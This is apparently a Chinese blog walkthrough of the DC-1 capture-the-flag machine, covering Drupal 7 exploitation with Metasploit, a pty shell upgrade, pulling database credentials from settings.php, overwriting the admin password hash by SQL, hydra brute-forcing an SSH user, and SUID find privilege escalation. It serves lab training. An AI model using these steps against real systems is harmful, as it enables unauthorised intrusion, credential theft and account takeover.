vulhub靶场-DC-1

前言:靶机导入,设置网卡NAT模式

主机探测,发现目标IP
在这里插入图片描述

扫描ip端口,访问目标80端口服务
在这里插入图片描述在这里插入图片描述

根据浏览器插件,发现页面使用 drupal 7这个cms,在kail漏洞库搜索是否有历史漏洞。
在这里插入图片描述

发现存在历史漏洞,进入msf搜索,使用以下几种漏洞利用方法。选择一种使用。查看需哟设置的参数。设置目标IP。
use 1
show optins
set rhosts 192.168.80.134
在这里插入图片描述在这里插入图片描述

运行,拿到shell
输入:python -c ‘import pty;pty.spawn(“/bin/bash”)’
获取标准shell
在这里插入图片描述在这里插入图片描述

查看当前目录下的文件,发现flag文件。打开flag文件,内容提示,配置文件信息。
在这里插入图片描述在这里插入图片描述在这里插入图片描述

一番寻找之下,发现sites/default/setting.php 文件打开查看,发现数据库的信息。
user:dbuser
pwd:R0ck3t
在这里插入图片描述

成功进入数据库,只有两个数据库,翻翻看
使用 user drupaldb 进入数据库
使用 show tables; 查看所有的表。发现users表。
查看表内信息:select * from Users;
在这里插入图片描述在这里插入图片描述

发现管理用户的密码,不过被加密了,尝试解密。官方发现加密文件位置\scripts\password-hash.sh
使用加密文件,加密12345
S S SDgVZvvXhuhBpi.8dM6ikcPv4DElveErq4BvIxIjS3aHScuDHYwRO
在这里插入图片描述在这里插入图片描述

进入数据库,修改admin用户密码。
update users set pass=’ S S SDgVZvvXhuhBpi.8dM6ikcPv4DElveErq4BvIxIjS3aHScuDHYwRO’ where name=’admin’;
在这里插入图片描述

使用admin 登录80端口页面。
在这里插入图片描述

一番寻找,在home/flag4.txt 查看根据提示,发现有flag4用户,使用hydra进行爆破
flag4
orange
在这里插入图片描述在这里插入图片描述

使用ssh登录flag4用户。对flag4进行提权
find ./ abc -exec ‘/bin/sh’ ;
在这里插入图片描述在这里插入图片描述

切换到root目录下,有个文件,打开。拿下
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值